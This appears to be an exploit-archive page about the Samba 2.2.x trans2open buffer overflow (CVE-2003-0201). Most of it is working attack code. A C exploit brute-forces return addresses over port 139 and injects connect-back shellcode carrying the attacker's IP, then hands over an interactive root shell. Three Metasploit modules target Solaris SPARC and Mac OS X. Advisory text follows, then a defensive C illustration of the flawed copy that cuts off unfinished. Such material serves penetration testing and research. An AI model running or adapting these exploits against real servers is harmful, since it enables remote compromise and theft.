	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
    		return -1;
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		if(errno != EINPROGRESS) {
      			close(fd);
      			return -1;
    		}
  	}
	else {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;

	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;

	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
		        } 

			else {
				errno = getsockopt_error;
				close(fd);
				return (-1);
				}

			}
		}
	else {
		close(fd);
		return 1;
	}

	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}
	return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);
	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}
  
	if(FD_ISSET(fd, &fdread)) {
  
  		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;
	
	} 
	else {
		close(fd);
		return 1;

	}
}

int
write_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdwrite;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
		close(fd);
		return (-1);
	}
	
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdwrite);
	FD_SET(fd, &fdwrite);

	select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;
	}
	
	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &fdwrite)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}
		return 1;
	}
	else { 
		close(fd);
		return -1;
	}
}

int 
start_session(int sock)
{
	char buffer[1000];
	char response[4096];
	char session_data1[] 	= "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[] 	= "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
		                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
	
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type 	= 0x00;         /* session message */
        netbiosheader->flags 	= 0x00;
        netbiosheader->length 	= htons(0x2E);

        smbheader->protocol[0] 	= 0xFF;
        smbheader->protocol[1] 	= 'S';
        smbheader->protocol[2] 	= 'M';
        smbheader->protocol[3] 	= 'B';
        smbheader->command 	= 0x73;         /* session setup */
        smbheader->flags 	= 0x08;         /* caseless pathnames */
        smbheader->flags2 	= 0x01;         /* long filenames supported */
        smbheader->pid 		= getpid() & 0xFFFF;
	smbheader->uid          = 100;
        smbheader->mid 		= 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

	if(write_timer(sock, 3) == 1)
		if (send(sock, buffer, 50, 0) < 0) return -1;

	memset(response, 0x00, sizeof(response));

	if (read_timer(sock, 3) == 1)
		if (read(sock, response, sizeof(response) - 1) < 0) return -1;
	
        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

	//if (netbiosheader->type != 0x00) fprintf(stderr, "+ Received a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
	smbheader->pid          = getpid() & 0xFFFF;
	smbheader->tid		= 0x00;
        smbheader->uid          = 100;

	memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

	char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

	int i = 0;
	unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
	smbheader->tid			= 0x01;
        smbheader->uid                  = 100;

	memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	buffer[1096] = 0xEB;
	buffer[1097] = 0x70;

	for (i = 0; i < 4 * 24; i += 8) {
		memcpy(buffer + 1099 + i, &dummy, 4);
		memcpy(buffer + 1103 + i, &ret,   4);
	}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
			exploit_data, sizeof(exploit_data) - 1);
	memcpy(buffer + 1800, shellcode, strlen(shellcode));

	if(write_timer(sock, 3) == 1) {
		if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
		return 0;
	}

	return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	for (i = 0; i < 4 * 24; i += 4)
		memcpy(buffer + 1131 + i, &dummy, 4);
		
        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024], *cmd="uname -a;id;\n";
 int n;

 send(sock, cmd, strlen(cmd), 0);

 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }

  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}

void GoAway() 
{
   exit(0);
}

void start_listen()
{
FILE *fstat;
int cpid;
   
LISTENER:

  bzero(&serv_addr, sizeof(serv_addr));
  serv_addr.sin_family=2;
  serv_addr.sin_addr.s_addr=0;
  serv_addr.sin_port=htons(port_listen); 
  sock_listen=socket(2,1,6);

  if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) 
  {   
      port_listen++;
      goto LISTENER;       
  }
   
  if(listen(sock_listen,1)) 
  {
      perror("listen");
      exit(1);
  }
   
  fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
   
  cpid = fork();
 
  if (cpid) {
     client=accept(sock_listen,0,0);
     LOOP = 0;
     kill(SIGUSR2, exploit_pid);
     if (client > 0) {
        fprintf(stdout, "[+] Yeah, I have a root ....!\n"
                      "------------------------------\n");
        fstat=fopen(".ROOT", "a");  //needed by mass.c
        fclose(fstat);
        shell(client);
     }
     exit(0);
  }
}

int
main (int argc,char *argv[])
{
   char *shellcode = NULL;
   int typeos	= -1;
   int port		= 139;
   int sock		= 0;
   int i		= 0;
   int status	= 0;
   int m		= 0;
   int ip1		= 0;
   int ip2		= 0;
   int ip3		= 0;
   int ip4		= 0;
   int sta		= 0;
   int STEPS	= 512;
   int ENDLOOP    = 64;
   char *desc; 
   unsigned long MAX_CHILDS  = 40;
   unsigned long ret         = 0x0;
   unsigned short int  a_port;
   struct sockaddr_in addr1;
   struct hostent *he;
   struct stat st;
   
      if (argc != 4) usage(argv[0]);
   
      typeos = atoi(argv[1]);
      if (typeos > 3) {
          fprintf(stdout, "Os type out of list!\n");
          exit(1);
      }

      he = gethostbyname(argv[2]);

      if (he == NULL) {
          fprintf(stderr, "Unable to resolve\n");
          return -1;
      }

      listen_pid = getpid();
      start_listen();
      exploit_pid = listen_pid + 1;

      //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);

      sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);		
      linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
      linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
      linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
      linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
				
      fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", 
					ip1, ip2, ip3, ip4, port_listen);

      a_port = htons(port_listen);
      
      linux_connect_back[177]= (a_port) & 0xff;
      linux_connect_back[178]= (a_port >> 8) & 0xff;
      bsd_connect_back[168]= (a_port) & 0xff;
      bsd_connect_back[169]= (a_port >> 8) & 0xff;

      switch(typeos) {
      case 0:
              desc = "Linux";
              ret = 0xc0000000;
              shellcode = linux_connect_back;
              break;
      case 1:
              desc = "FreeBSD/NetBSD";
              ret = 0xbfc00000;
              shellcode = bsd_connect_back;
              break;
      case 2:
              desc = "OpenBSD 3.1 and prior";
              ret = 0xdfc00000;
              shellcode = bsd_connect_back;
              break;
      case 3:
              desc = "OpenBSD 3.2 non-exec stack";
              ret = 0x00170000;
              shellcode = bsd_connect_back;
              break;
      }

      fprintf(stdout, "[+] Target: %s\n", desc);
      memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

      addr1.sin_family = AF_INET;
      addr1.sin_port	 = htons(port);	

      fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
      fprintf(stdout, "[+] Please wait in seconds...!\n");

      signal(SIGUSR2, GoAway);
   
      for (i = 0; i < 50; i++) childs[i] = -1;
      i = 0; m = 0;

      while (LOOP) {

           if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
              fprintf(stderr, "[+] socket() error.\n");
              exit(-1);
           }

           ret -= STEPS; i++;
           if ((ret & 0xff) == 0x00 && typeos != 3) ret++;             

           m++; 
           //fflush(0);
           //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m);

           usleep(150000);

           switch (childs[i] = fork()) {
           case 0:  
                  if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 
                      //fprintf(stderr, "[+] connect() error.\n");
                      close(sock);
                      exit(-1);
                  }
			
                 start_session(sock);
                 sleep(3);
		     		         
                 if (typeos != 3) {
                           if (exploit_normal(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                 } else {
                           if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                  }
                  sleep(5);
                  close(sock);
                  exit(0);
                  break;
           case -1:
                  exit(-1);
                  break;
           default:
                  if (i > MAX_CHILDS - 2) {
                      wait(&status);
                      i--;
                  }
                  break;
           } 

           if (m == ENDLOOP) LOOP = 0;
      } 	   

      if (stat(".ROOT", &st) != -1) 
         kill(SIGUSR2, listen_pid);
      else {	
           fprintf(stdout, "[+] Dohh, exploit failed.\n");
	   close(client); close(sock_listen);
           kill(listen_pid, SIGUSR2);
	   sleep(2);
	   exit(0);
      }
}
		

- Vulnerability information (22471)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4) (EDBID:22471)
unix remote
2003-04-07 Verified
0 noir
N/A
source: http://www.securityfocus.com/bid/7294/info
   
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
   
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
   
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

http://www.exploit-db.com/sploits/22471.tar.gz		

- Vulnerability information (F84542)

Samba trans2open Overflow (Solaris SPARC) (PacketStormID:F84542)
2009-12-31 00:00:00
H D Moore  metasploit.com
exploit,overflow
solaris
CVE-2003-0201

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.

##
# $Id: trans2open.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba trans2open Overflow (Solaris SPARC)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on Solaris SPARC systems that do not
				have the noexec stack option set. Big thanks to MC and
				valsmith for resolving a problem with the beta version of
				this module.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'solaris',
			'Targets'        => 
				[
					["Samba 2.2.x Solaris 9 (sun4u)",  
						{
							'Arch' => ARCH_SPARC, 
							'Rets' => [0xffbffaf0, 0xffbfa000, 128, 0xffbffffc],
						},
					],
					["Samba 2.2.x Solaris 7/8 (sun4u)",
						{
							'Arch' => ARCH_SPARC, 
							'Rets' => [0xffbefaf0, 0xffbea000, 128, 0xffbefffc],
						}
					],
				],
			'DisclosureDate' => 'Apr 7 2003'
			))
			
			register_options(
				[
					Opt::RPORT(139)
				], self.class)
					
	end

	def exploit
	
		curr_ret = target['Rets'][0]
		while (curr_ret >= target['Rets'][1])
			break if session_created?
			begin
				print_status("Trying return address 0x%.8x..." %  curr_ret)

				connect
				smb_login
							
				#
				# The obstacle course:
				# 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
				# 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
				# 	return(outsize);
				#

				# This value *must* be 1988 to allow findrecv shellcode to work
				pattern = rand_text_english(1988)

				#
				# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
				#
				# Patch the overwritten heap pointers
				# substr($pattern, 1159, 4, pack('N', $target->[4]));
				# substr($pattern, 1163, 4, pack('N', $target->[4]));
				#
				# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
				# substr($pattern, 1195, 4, pack('N', 0xffffffff));
				#
				# Fix the frame pointer (need to check for null in address)
				# substr($pattern, 1243, 4, pack('N', $target->[3]-64));
				#
				# Finally set the return address
				# substr($pattern, 1247, 4, pack('N', $curr_ret));
				#

				#
				# This method is more reliable against a wider range of targets
				#

				# Local variable pointer patches for early versions of 2.2.x
				pattern[1103, 36] = [target['Rets'][3] - 1024].pack('N') * 9

				# Overwrite heap pointers with a ptr to NULL at the top of the stack
				pattern[1139, 40] = [target['Rets'][3] - 1024].pack('N') * 10

				# Patch the type index into the smb_messages[] array...
				# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
				pattern[1179, 20] = [0xffffffff].pack('N') * 5

				# This stream covers the framepointer and the return address
				pattern[1199, 400] = [curr_ret].pack('N') * 100

				# Stuff the shellcode into the request
				pattern[3, payload.encoded.length] = payload.encoded

				trans =
				  "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				  "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				  "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				  pattern

				sock.put(trans)
				handler
				
			rescue EOFError
			rescue => e
				break
			end
			
			curr_ret -= target['Rets'][2]
		end
	end

end
    

- Vulnerability information (F84541)

Samba trans2open Overflow (Mac OS X) (PacketStormID:F84541)
2009-12-31 00:00:00
H D Moore  metasploit.com
exploit,overflow
apple,osx
CVE-2003-0201

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.

##
# $Id: trans2open.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba trans2open Overflow (Mac OS X)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,

				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        => 
				[
					['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],

				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(139)
				], self.class)
	end

	# Need to perform target detection
	def autofilter
		false
	end

	def exploit
		curr_ret = target['Rets'][0]
		while (curr_ret >= target['Rets'][1])
			break if session_created?
			begin
				print_status("Trying return address 0x%.8x..." %  curr_ret)

				connect
				smb_login
	
				# 1988 is required for findrecv shellcode
				pattern = rand_text_english(1988)
	
				# This stream covers the framepointer and the return address
				pattern[1195, 64] = [curr_ret].pack('N') * 16

				# Stuff the shellcode into the request
				pattern[3, payload.encoded.length] = payload.encoded

				trans =
					"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
					"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
					pattern

				sock.put(trans)
				handler
				disconnect
				
			rescue EOFError
			rescue => e
				print_status("Caught exception: #{e}")
				break
			end
			curr_ret -= target['Rets'][2]
		end
	end
end
    

- Vulnerability information (F82311)

Samba trans2open Overflow (PacketStormID:F82311)
2009-10-28 00:00:00
H D Moore  metasploit.com
exploit,overflow
apple,osx
CVE-2003-0201

This Metasploit module exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba trans2open Overflow (Mac OS X)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,

				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        => 
				[
					['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],

				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(139)
				], self.class)
	end

	# Need to perform target detection
	def autofilter
		false
	end

	def exploit
		curr_ret = target['Rets'][0]
		while (curr_ret >= target['Rets'][1])
			break if session_created?
			begin
				print_status("Trying return address 0x%.8x..." %  curr_ret)

				connect
				smb_login
	
				# 1988 is required for findrecv shellcode
				pattern = rand_text_english(1988)
	
				# This stream covers the framepointer and the return address
				pattern[1195, 64] = [curr_ret].pack('N') * 16

				# Stuff the shellcode into the request
				pattern[3, payload.encoded.length] = payload.encoded

				trans =
					"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
					"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
					pattern

				sock.put(trans)
				handler
				disconnect
				
			rescue EOFError
			rescue => e
				print_status("Caught exception: #{e}")
				break
			end
			curr_ret -= target['Rets'][2]
		end
	end
end

    

- Vulnerability information

OSVDB ID: 4469
Title: Samba trans2.c call_trans2open() Function Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Public, Commercial

- Vulnerability description

Samba contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in trans2.c, in which user input to the call_trans2open() function is not properly sanitized. If an attacker supplies an overly long string for the pname variable, they may be able to overflow the buffer and execute arbitrary code with the privileges of the server.
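
An added illustration, not code from this page, from Samba or from the Metasploit modules above: the copy pattern the description refers to, where a length derived from the client-supplied name drives a copy into a fixed 1024-byte pstring, placed next to a copy bounded by the destination. The frame layout, the sentinel value and the function names are constructed for this example, and the frame is modelled as a flat byte array so that the overrun stays within defined behaviour.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Samba's pstring is a fixed 1024-byte buffer (the size named in the advisory text). */
#define PSTRING_LEN 1024

/*
 * Constructed model of the stack frame around fname in call_trans2open():
 * the 1024-byte pstring is followed by a 4-byte slot standing in for the
 * saved return address.  Real layouts vary by compiler and platform; the
 * point is only to make an over-long copy land on control data visibly.
 */
struct frame_model {
    uint8_t bytes[PSTRING_LEN + 4];
};

#define RET_SLOT     PSTRING_LEN   /* offset of the modelled return slot */
#define SENTINEL_RET 0x41424344u   /* constructed marker with no zero bytes */

static void frame_init(struct frame_model *f)
{
    uint32_t v = SENTINEL_RET;
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + RET_SLOT, &v, sizeof v);
}

static uint32_t frame_ret_slot(const struct frame_model *f)
{
    uint32_t v;
    memcpy(&v, f->bytes + RET_SLOT, sizeof v);
    return v;
}

/*
 * The flawed pattern: StrnCpy(fname, pname, namelen) with namelen taken
 * from the input itself (strlen(pname) + 1), so the "bound" is whatever
 * the client sent.  The copy is clamped to the model array only so that
 * this demonstration stays within defined behaviour.
 */
static void copy_unchecked(struct frame_model *f, const char *pname)
{
    size_t namelen = strlen(pname) + 1;
    if (namelen > sizeof f->bytes)
        namelen = sizeof f->bytes;
    memcpy(f->bytes, pname, namelen);   /* runs past fname when namelen > 1024 */
}

/*
 * The hardened pattern: bound the copy by the destination, not the input.
 * Returns 0 on success and -1 when the name does not fit, which is where a
 * server should reject the request.  Samba 2.2.8a fixed the bug upstream;
 * this check is illustrative, not that patch.
 */
static int copy_checked(struct frame_model *f, const char *pname)
{
    size_t namelen = strlen(pname) + 1;
    if (namelen > PSTRING_LEN)
        return -1;
    memcpy(f->bytes, pname, namelen);
    return 0;
}

/* Builds a constructed client-supplied name of n non-NUL bytes. */
static char *make_name(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

/* 1 if a name of input_len bytes makes the unchecked copy clobber the return slot, 0 if not. */
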